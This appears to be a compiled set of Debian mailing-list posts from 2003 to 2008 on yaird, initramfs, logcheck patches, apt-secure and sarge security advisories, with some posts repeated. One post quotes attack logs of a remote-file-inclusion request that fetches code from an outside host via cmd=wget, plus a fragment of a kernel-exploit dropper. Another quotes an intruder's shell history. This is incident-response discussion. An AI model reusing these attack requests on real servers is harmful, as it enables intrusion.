Re: [Yaird-devel] Bug#496500: yaird: fails to create initrd when running 2.6.24 etchnhalf kernel
On Mon, 25 Aug 2008, Jonas Smedegaard wrote: > +1021_new-style_firewire.patch etch+half kernel has old ieee1394, no need for that one. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [Yaird-devel] Bug#496500: yaird: fails to create initrd when running 2.6.24 etchnhalf kernel
On Mon, Aug 25, 2008 at 12:26 PM, Jonas Smedegaard <[EMAIL PROTECTED]> wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > On Mon, Aug 25, 2008 at 04:29:39PM +0800, James Andrewartha wrote: >>Package: yaird >>Version: 0.0.12-18 >>Severity: important >> >>This is bug 431534, exposed again because stable has an old version of >>yaird but a recent kernel. > > Acknowledged. > > I see some different approaches to this: > > 1. Leave this bug open but do nothing about it. > * This bug is not a security issue in itself > * Security-related kernel updates can switch to initramfs-tools etch+half linux images are an optional upgrade. never meant to be the default. > 2. Release 0.0.12-18+etch1 fixing only this specific issue > * Security-updates must be minimal > 3. Release backport of newest yaird in unstable > * Linux changes are large already, so "must be minimal" cannot > apply here > * Most if not all recent yaird changes are to support the major > changes to recent Linux kernels > 4. Drop yaird from etchnhalf > * Yaird has been dropped from testing (see bug#457177) that would mean dropping yaird out of etch, seems a bit late for that too. > > > If we do 1) when should probably go through and etch-tag all other bugs > fixed recently. > > If we do 3) then a single change must be made compared to current > package in Sid: LVM workaround must be enabled by default. > > > Cc'ing release team and security team for input. > > > NB! Even if yaird really is "generally too buggy" as judged in > bug#457177, the current release in unstable is far better than the > version currently in Etch, (contains no known regressions, and actually > works out-of-the-box in many cases with recent Linux kernels whereas > etch release don't). this diff seems a bit huge for a stable update. also considering that lenny is about to be released. as yaird is considered to be working with default etch kernel, that bug doesn't need any further action. regards -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Why not have firewall rules by default?
On Wed, Jan 23, 2008 at 08:29:25AM -0700, Michael Loftis wrote: > > It's better to leave the service disabled, or even better, completely > uninstalled from a security standpoint, and from a DoS standpoint as well. > The Linux kernel isn't very efficient at processing firewall rules. Newer > kernels might be though (I honestly haven't looked as deeply into this in > late 2.6 as i did/do in 2.4...2.4 processes firewall rules strictly step by > step) baah any 2.4 info is terribly outdated these days (beside not beeing supported on any modern distro). it was already when 2.6.0 got released, but woow for a better feeling of dev speed, check out git: ~/src/linux-2.6$ git diff --shortstat v2.6.22..v2.6.23 7203 files changed, 406268 insertions(+), 339071 deletions(-) 2.6.24 is not yet released: ~/src/linux-2.6$ git diff --shortstat v2.6.23.. 10203 files changed, 775468 insertions(+), 482968 deletions(-) -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: initrd without root console?
hello harald, On Sun, Mar 11, 2007 at 01:43:21PM +0100, Harald Krammer wrote: > Hi maximilian, > thanks, that's it. top posting is a bad ml reply style http://www.caliburn.nl/topposting.html > How about to set it as default behavior? isn't the answer quite obvious!? anyway this is ot here and belongs to d-kernel. amicalement -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: initrd without root console?
hello, On Sun, Mar 11, 2007 at 10:53:34AM +0100, Harald Krammer wrote: > Hi! > I saw new behavior in Debian / Etch and I am not sure what I should > think about. > If the boot-up fails to mount the root-disk then I will get a root > console without any password authentication. Is it easy possible to > switch off this feature? http://www.debian.org/doc/manuals/securing-debian-howto/ch4.en.html#s-kernel-initramfs-prompt sunny greetings -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: ***DEB*: Re: help needed
On Mon, Nov 06, 2006 at 06:21:26PM +0100, Fuzzums wrote:
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 495
> "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget";
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET
> http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
> HTTP/1.0" 403 499
> "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget";
> "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
>
> http://213.202.214.106/CMD.gif isn't a gif.
>
> [snip]
>
> if ($kernel == "write") {
>$kernel = "/*\n" .
> " * hatorihanzo.c\n" .
> " * Linux kernel do_brk vma overflow exploit.\n" .
> " *\n" .
> " * The bug was found by Paul (IhaQueR) Starzetz
> <[EMAIL PROTECTED]>\n" .
> " *\n" .
> " * Further research and exploit development by\n" .
> " * Wojciech Purczynski <[EMAIL PROTECTED]> and Paul
> Starzetz.\n" .
> " *\n" .
> " * (c) 2003 Copyright by IhaQueR and cliph. All Rights
> Reserved.\n" .
> " *\n" .
> " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION
> AND ANY USE\n" .
> " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
>
> [/snip]
>
> I think this will give you an idea of what happened.
keep your kernel uptodate, easiest if you use the Debian provided
linux images they have security support.
this hole is closed since long there.
--
maks
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Target filesystem
On Fri, Jun 09, 2006 at 07:47:45AM -0400, Brent Clark wrote: > Hey all > > I seem to be experiencing problems booting up (Thank goodness for Knoppix) > > There are a host of errors, but the end message is: > > Target filesystem doesn't have /sbin/init > /bin/sh: can't access tty; job control turned off and then I get busybox > > From googling this seems a common problem. > > Would anyone know how to force this to work? you are posting to the wrong ml, debian-security has _nothing_ to do with early boot! and the actual error message is just above from what you pasted. > From what I gather it cant detect the filesystem (think its a modprobe > problem) do you run latest udev 0.093-1 version? (if not upgrade) do you pass the correct boot param in grub root=/dev/sdaX or /dev/hdaX presumambly. is your root device created? check ls $ROOT in rescue console. if not and with wrong udev and old 2.6.15 use modprobe ide-disk > If anyone can assist, it would be most appreciated. > > Kind Regards > Brent Clark please take the effort to research correct ml debian-user-$lang or file a bug against initramfs-tools if the problem persists. regards -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [sec] Re: failed root login attempts
On Sun, 19 Sep 2004, martin f krafft wrote: > also sprach Noah Meyerhans <[EMAIL PROTECTED]> [2004.09.19.2219 +0200]: > > As an additional point against these scripts, they are host based. > > If I'm going to bother blackholing the source of these login > > attempts, I'm going to do it at the border. Yes, I can write > > scripts to react to this kind of scanning and have it > > automatically manipulate access lists on the routers, I'm not sure > > I really like the idea. I'm sort of leaning in that direction, at > > this point, though, just to shut up logcheck without telling it to > > ignore all failed root login attempts. > > If you ask me, logcheck should learn how to evaluate log messages in > their context... hmm there are ideas for logcheck after sarge+1, please elaborate. ATM logcheck is a pretty dumb `egrep -v' wrapper of your logs. that symplicity of design has it's strength, but there are for example demands for trigger values. -- maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: [sec] debian patched linux kernels
On Mon, 16 Aug 2004, LeVA wrote: > Hi! > > Is the debian patched kernels are preferred for server/desktop use, or > they are just minor cosmetic patches? what is the difference between > the kernel.org's kernel source and the debian patched kernel sources? long version read debian/changelog of kernel-source-2.x.x short try: removed drivers with inappropriate licences. upstream fixes that didn't made it for latest release, but are scheduled for next release or not yet included bugfixes (this include from time to time security fixes) so if you don't read lkml you are better of with the kernel-source provided by debian. the debian kernel team is maintained by upstream maintainers, which know their job. on the nice side the debian kernel are very close to those of kernel.org. a++ maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#241236: [patch] ignore files in ignore.d.violations without prefix
Package: logcheck Version: 1.2.16 Severity: wishlist Tags: patch hello steve kemp, this patches allows the user to _really_ write his own files in ignore.d.violations previous they had to have the prefix logcheck-, which isn't handy, not documented and therefor seems to be a bug .. took some time to figure out. ;) as a side note logcheck install rules in this dir without logchek- prefix like su. as a bonus attached patch catches also a typing fix. regards maks ps tested on my machine, works like charm. --- logcheck-1.2.16/src/logcheck2004-03-03 20:39:53.0 +0100 +++ logcheck-1.2.16-maks/src/logcheck 2004-03-31 15:29:48.0 +0200 @@ -233,7 +233,7 @@ RETURN=1 -for grepfile in $(ls -1 $raise | grep -v "logcheck-.*"); do +for grepfile in $(ls -1 $raise); do debug "greplogoutput: $grepfile" egrep --text -f $raise/$grepfile $TMPDIR/logoutput-sorted \ @@ -252,8 +252,8 @@ if [ "$(basename $grepfile)" = "logcheck" ]; then debug "Applying Logcheck override files" - # Now ignore all entries from the locgheck- files - for file in $(ls -1 $ignore/ | grep "logcheck-.*") ; do + # Now ignore all entries from the logcheck- files + for file in $(ls -1 $ignore/) ; do debug "clean logcheck-: $file" egrep --text -v -f $ignore/$file $TMPDIR/checked \ >> $TMPDIR/checked.1 signature.asc Description: Digital signature
Bug#241236: [patch] ignore files in ignore.d.violations without prefix
Package: logcheck Version: 1.2.16 Severity: wishlist Tags: patch hello steve kemp, this patches allows the user to _really_ write his own files in ignore.d.violations previous they had to have the prefix logcheck-, which isn't handy, not documented and therefor seems to be a bug .. took some time to figure out. ;) as a side note logcheck install rules in this dir without logchek- prefix like su. as a bonus attached patch catches also a typing fix. regards maks ps tested on my machine, works like charm. --- logcheck-1.2.16/src/logcheck2004-03-03 20:39:53.0 +0100 +++ logcheck-1.2.16-maks/src/logcheck 2004-03-31 15:29:48.0 +0200 @@ -233,7 +233,7 @@ RETURN=1 -for grepfile in $(ls -1 $raise | grep -v "logcheck-.*"); do +for grepfile in $(ls -1 $raise); do debug "greplogoutput: $grepfile" egrep --text -f $raise/$grepfile $TMPDIR/logoutput-sorted \ @@ -252,8 +252,8 @@ if [ "$(basename $grepfile)" = "logcheck" ]; then debug "Applying Logcheck override files" - # Now ignore all entries from the locgheck- files - for file in $(ls -1 $ignore/ | grep "logcheck-.*") ; do + # Now ignore all entries from the logcheck- files + for file in $(ls -1 $ignore/) ; do debug "clean logcheck-: $file" egrep --text -v -f $ignore/$file $TMPDIR/checked \ >> $TMPDIR/checked.1 signature.asc Description: Digital signature
Re: [sec] Time for apt-secure?
On Thu, 27 Nov 2003, Camillo Särs wrote: > I am using apt-secure, but it's not part of stable. What's the real > plan > for apt-secure, will it be standard in the next major release? AFAIK, > there are many wrinkles to be ironed out... i agree that it would be nice to have the choice of an apt-sec package basically latest apt just with the relevant patch from http://monk.debian.net/apt-secure/ maybe someone could build such a packet? a++ maks
Re: [sec] Time for apt-secure?
On Thu, 27 Nov 2003, Camillo Särs wrote: > I am using apt-secure, but it's not part of stable. What's the real > plan > for apt-secure, will it be standard in the next major release? AFAIK, > there are many wrinkles to be ironed out... i agree that it would be nice to have the choice of an apt-sec package basically latest apt just with the relevant patch from http://monk.debian.net/apt-secure/ maybe someone could build such a packet? a++ maks -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
[check] DSA vulnerabilities sarge
hi, i checked almost all DSA since woody release (DSA > 133) the resume is: on a clean exposed sarge install the vast majority of DSA is resolved, but you better not run kde, sendmail, mysql, perl (cgi), php, tomcat or imagemagick. you'll find below the report listing security alerts affecting sarge, and the resolved ones (by new upstream release and|or new package, which went into sarge until now). the report lacks at the time about 50 DSA, where the reference to sid is "this problem will be fixed soon". in the next week i'll look deeper in their cases, for the moment i only parsed the DSA themselves. as a side note this work would be easier if the DSA would generally list "fixed by upstream version 2.2.22" this information rarely shows up on a DSA, i tend to think that such notice would improve their outstanding quality! i hope this helps for further and broader testing of sarge, i know the debian security faq concerning testing, but perhaps someone out there wants to provide an unofficial security mirror especially after kde goes in? perhaps in a month or so unresolved issues should get their bug report, what do you think? i will try to keep you informed weekly on progress, suggestions or corrections are welcome!!! a++ ma(ks|x(imilian)?) DSA affecting Sarge/Testing: [19 Sep 2003] DSA-388_kdebase - several vulnerabilities sarge 4:2.2.2-14 [17 Sep 2003] DSA-384_sendmail - buffer overflows sarge 8.12.9-5 sid fixed in version 8.12.10-1 [13 Sep 2003] DSA-381_mysql - buffer overflow sarge 4.0.13-3 upstream version until 4.0.14 vulnerable [11 Aug 2003] DSA-371_perl - cross-site scripting sarge 5.8.0-18 sid fixed in version 5.8.0-19 [08 Aug 2003] DSA-369_zblast - buffer overflow sarge 1.2pre-5 sid fixed in version 1.2.1-7 [05 Aug 2003] DSA-365_phpgroupware - several vulnerabilities bug #201980 upstream release fixes reported bugs 0.9.14.006 [01 Aug 2003] DSA-361_kdelibs,_kdelibs-crypto - several vulnerabilities sarge 4:2.2.2-13 no seperate kdelibs-crypto sid fixed in version 4:3.1.3-1 [31 Jul 2003] DSA-359_atari800 - buffer overflows sarge 1.2.2-1 bug #203707 upstream version 1.3.1-2 fixes reported bug [29 Jul 2003] DSA-354_xconq - buffer overflows sarge 7.4.1-2.1 bug #202963 still open [22 Jul 2003] DSA-352_fdclone - insecure temporary directory sarge 2.04a-1 sid fixed in version 2.04-1 [16 Jul 2003] DSA-351_php4 - cross-site scripting sarge 4:4.1.2-6 bug #200736 upstream version php4_4.3.2+rc3 fixed XSS vulnerabilities [08 Jul 2003] DSA-343_skk,_ddskk - insecure temporary file sarge skk 10.62a-6 ddskk 12.2.rel.0-2 upstream fixed in 12.1.cvs.20030622-1 [07 Jul 2003] DSA-342_mozart - unsafe mailcap configuration sarge 1.2.3.20011204-3 sid fixed in version 1.2.5.20030212-2 [08 Jul 2003] DSA-346_phpsysinfo - directory traversal sarge 2.0-3 bug #200543 still open [27 Jun 2003] DSA-331_imagemagick - insecure temporary file sarge 4:5.4.4.5-1 sid fixed in version 4:5.5.7-1 [19 May 2003] DSA-306_ircii-pana - buffer overflows, integer overflow sarge 1:1.0-0c19.20030512-1 sid fixed in version 1.0-0c19-8 [30 Apr 2003] DSA-296_kdebase - insecure execution sarge 4:2.2.2-14 [23 Apr 2003] DSA-293_kdelibs - insecure execution sarge 4:2.2.2-13 [17 Apr 2003] DSA-289_rinetd - incorrect memory resizing sarge 0.62-1 sid fixed in version 0.62-2 [12 Apr 2003] DSA-284_kdegraphics - insecure execution sarge 4:2.2.25 [28 Feb 2003] DSA-256_mhc - insecure temporary file sarge 0.25+20010625-7 sid fixed in version 0.25+20030224-1 [12 Feb 2003] DSA-250_w3mmee-ssl - missing HTML quoting sarge 0.3.p23.3-1.5 sid fixed in version 0.3.p24.17-3 [24 Jan 2003] DSA-243_kdemultimedia - several vulnerabilities sarge 4:2.2.25 [24 Jan 2003] DSA-242_kdebase - several vulnerabilities sarge 4:2.2.2-14 [24 Jan 2003] DSA-241_kdeutils - several vulnerabilities sarge 4:2.2.25 [23 Jan 2003] DSA-240_kdegames - several vulnerabilities sarge 4:2.2.2-2 [23 Jan 2003] DSA-239_kdesdk - several vulnerabilities sarge 4:2.2.25 [23 Jan 2003] DSA-238_kdepim - several vulnerabilities sarge 4:2.2.2-5 [22 Jan 2003] DSA-237_kdenetwork - several vulnerabilities sarge 4:2.2.2-14.1 [22 Jan 2003] DSA-236_kdelibs - several vulnerabilities sarge 4:2.2.2-13 [22 Jan 2003] DSA-235_kdegraphics - several vulnerabilities sarge 4:2.2.25 [22 Jan 2003] DSA-234_kdeadmin - several vulnerabilities sarge 4:2.2.25 [09 Jan 2003] DSA-225_tomcat4 - source disclosure sarge 4.0.4-4 sid fixed in version 4.1.16-1 [20 Dec 2002] DSA-214_kdnetwork - buffer overflows sarge 4:2.2.2-14.1 sid fixed 2.2.2-14.20 [11 Nov 2002] DSA-193_kdenetwork - buffer overflow sarge 4:2.2.2-14.1 sid fixed in version 2.2.2-14.3 [04 Oct 2002] DSA-170_tomcat4 - source code disclosure sarge 4.0.4-4 sid fixed in version 4.1.12-1 [18 Sep 2002] DSA-168_php - bypassing safe_mode, CRLF injection sarge 4.1.2-6 sid fixed in version 4.2.3-3 TODO: deeper look in the following security alerts mostly "this problem will be fixed soon" +.. [28 Sep 2003] DSA-391_freesweep - buffer overflow [26 Sep 2003] DSA-390_marbles - bu
[check] DSA vulnerabilities sarge
hi, i checked almost all DSA since woody release (DSA > 133) the resume is: on a clean exposed sarge install the vast majority of DSA is resolved, but you better not run kde, sendmail, mysql, perl (cgi), php, tomcat or imagemagick. you'll find below the report listing security alerts affecting sarge, and the resolved ones (by new upstream release and|or new package, which went into sarge until now). the report lacks at the time about 50 DSA, where the reference to sid is "this problem will be fixed soon". in the next week i'll look deeper in their cases, for the moment i only parsed the DSA themselves. as a side note this work would be easier if the DSA would generally list "fixed by upstream version 2.2.22" this information rarely shows up on a DSA, i tend to think that such notice would improve their outstanding quality! i hope this helps for further and broader testing of sarge, i know the debian security faq concerning testing, but perhaps someone out there wants to provide an unofficial security mirror especially after kde goes in? perhaps in a month or so unresolved issues should get their bug report, what do you think? i will try to keep you informed weekly on progress, suggestions or corrections are welcome!!! a++ ma(ks|x(imilian)?) DSA affecting Sarge/Testing: [19 Sep 2003] DSA-388_kdebase - several vulnerabilities sarge 4:2.2.2-14 [17 Sep 2003] DSA-384_sendmail - buffer overflows sarge 8.12.9-5 sid fixed in version 8.12.10-1 [13 Sep 2003] DSA-381_mysql - buffer overflow sarge 4.0.13-3 upstream version until 4.0.14 vulnerable [11 Aug 2003] DSA-371_perl - cross-site scripting sarge 5.8.0-18 sid fixed in version 5.8.0-19 [08 Aug 2003] DSA-369_zblast - buffer overflow sarge 1.2pre-5 sid fixed in version 1.2.1-7 [05 Aug 2003] DSA-365_phpgroupware - several vulnerabilities bug #201980 upstream release fixes reported bugs 0.9.14.006 [01 Aug 2003] DSA-361_kdelibs,_kdelibs-crypto - several vulnerabilities sarge 4:2.2.2-13 no seperate kdelibs-crypto sid fixed in version 4:3.1.3-1 [31 Jul 2003] DSA-359_atari800 - buffer overflows sarge 1.2.2-1 bug #203707 upstream version 1.3.1-2 fixes reported bug [29 Jul 2003] DSA-354_xconq - buffer overflows sarge 7.4.1-2.1 bug #202963 still open [22 Jul 2003] DSA-352_fdclone - insecure temporary directory sarge 2.04a-1 sid fixed in version 2.04-1 [16 Jul 2003] DSA-351_php4 - cross-site scripting sarge 4:4.1.2-6 bug #200736 upstream version php4_4.3.2+rc3 fixed XSS vulnerabilities [08 Jul 2003] DSA-343_skk,_ddskk - insecure temporary file sarge skk 10.62a-6 ddskk 12.2.rel.0-2 upstream fixed in 12.1.cvs.20030622-1 [07 Jul 2003] DSA-342_mozart - unsafe mailcap configuration sarge 1.2.3.20011204-3 sid fixed in version 1.2.5.20030212-2 [08 Jul 2003] DSA-346_phpsysinfo - directory traversal sarge 2.0-3 bug #200543 still open [27 Jun 2003] DSA-331_imagemagick - insecure temporary file sarge 4:5.4.4.5-1 sid fixed in version 4:5.5.7-1 [19 May 2003] DSA-306_ircii-pana - buffer overflows, integer overflow sarge 1:1.0-0c19.20030512-1 sid fixed in version 1.0-0c19-8 [30 Apr 2003] DSA-296_kdebase - insecure execution sarge 4:2.2.2-14 [23 Apr 2003] DSA-293_kdelibs - insecure execution sarge 4:2.2.2-13 [17 Apr 2003] DSA-289_rinetd - incorrect memory resizing sarge 0.62-1 sid fixed in version 0.62-2 [12 Apr 2003] DSA-284_kdegraphics - insecure execution sarge 4:2.2.25 [28 Feb 2003] DSA-256_mhc - insecure temporary file sarge 0.25+20010625-7 sid fixed in version 0.25+20030224-1 [12 Feb 2003] DSA-250_w3mmee-ssl - missing HTML quoting sarge 0.3.p23.3-1.5 sid fixed in version 0.3.p24.17-3 [24 Jan 2003] DSA-243_kdemultimedia - several vulnerabilities sarge 4:2.2.25 [24 Jan 2003] DSA-242_kdebase - several vulnerabilities sarge 4:2.2.2-14 [24 Jan 2003] DSA-241_kdeutils - several vulnerabilities sarge 4:2.2.25 [23 Jan 2003] DSA-240_kdegames - several vulnerabilities sarge 4:2.2.2-2 [23 Jan 2003] DSA-239_kdesdk - several vulnerabilities sarge 4:2.2.25 [23 Jan 2003] DSA-238_kdepim - several vulnerabilities sarge 4:2.2.2-5 [22 Jan 2003] DSA-237_kdenetwork - several vulnerabilities sarge 4:2.2.2-14.1 [22 Jan 2003] DSA-236_kdelibs - several vulnerabilities sarge 4:2.2.2-13 [22 Jan 2003] DSA-235_kdegraphics - several vulnerabilities sarge 4:2.2.25 [22 Jan 2003] DSA-234_kdeadmin - several vulnerabilities sarge 4:2.2.25 [09 Jan 2003] DSA-225_tomcat4 - source disclosure sarge 4.0.4-4 sid fixed in version 4.1.16-1 [20 Dec 2002] DSA-214_kdnetwork - buffer overflows sarge 4:2.2.2-14.1 sid fixed 2.2.2-14.20 [11 Nov 2002] DSA-193_kdenetwork - buffer overflow sarge 4:2.2.2-14.1 sid fixed in version 2.2.2-14.3 [04 Oct 2002] DSA-170_tomcat4 - source code disclosure sarge 4.0.4-4 sid fixed in version 4.1.12-1 [18 Sep 2002] DSA-168_php - bypassing safe_mode, CRLF injection sarge 4.1.2-6 sid fixed in version 4.2.3-3 TODO: deeper look in the following security alerts mostly "this problem will be fixed soon" +.. [28 Sep 2003] DSA-391_freesweep - buffer overflow [26 Sep 2003] DSA-390_marbles - bu
Re: [sec] Re: Strange segmentation faults and Zombies
On Thu, 18 Sep 2003, Christian Storch wrote: > Don't forget to try to find the potential hole first! > Otherwise you could have a fast recurrence. > [..] > > > in /etc/.rpn theres a .bash_history with the following content: > > > >id > > > >mkdir /etc/.rpn > > > >ps -aux > > > >ps -aux | grep tbk > > > >kill -15292 pid > > > >kill 15292 > > > >netconf > > > >locate httpd.conf > > > >cd /etc/.rpn > > > >ls -al > > > >wget > > > >cd /var/www/cncmap/www/upload/renegade > > > >ls -al > > > >rm -rf phpshell.php ^__^ was this the exploited hole ? thx for info a++ maks -- free software is not free at all, and "actually a different form of monopoly" ARLENE MCCARTHY member of the european parliament (labour party) -> http://swpat.ffii.org/#guardian-nhill030619 please pay attention avoiding software patents: -> http://swpat.ffii.org/index.en.html pgpniBwCGvhFC.pgp Description: PGP signature
Re: [sec] Re: Strange segmentation faults and Zombies
On Thu, 18 Sep 2003, Christian Storch wrote: > Don't forget to try to find the potential hole first! > Otherwise you could have a fast recurrence. > [..] > > > in /etc/.rpn theres a .bash_history with the following content: > > > >id > > > >mkdir /etc/.rpn > > > >ps -aux > > > >ps -aux | grep tbk > > > >kill -15292 pid > > > >kill 15292 > > > >netconf > > > >locate httpd.conf > > > >cd /etc/.rpn > > > >ls -al > > > >wget > > > >cd /var/www/cncmap/www/upload/renegade > > > >ls -al > > > >rm -rf phpshell.php ^__^ was this the exploited hole ? thx for info a++ maks -- free software is not free at all, and "actually a different form of monopoly" ARLENE MCCARTHY member of the european parliament (labour party) -> http://swpat.ffii.org/#guardian-nhill030619 please pay attention avoiding software patents: -> http://swpat.ffii.org/index.en.html pgp0.pgp Description: PGP signature
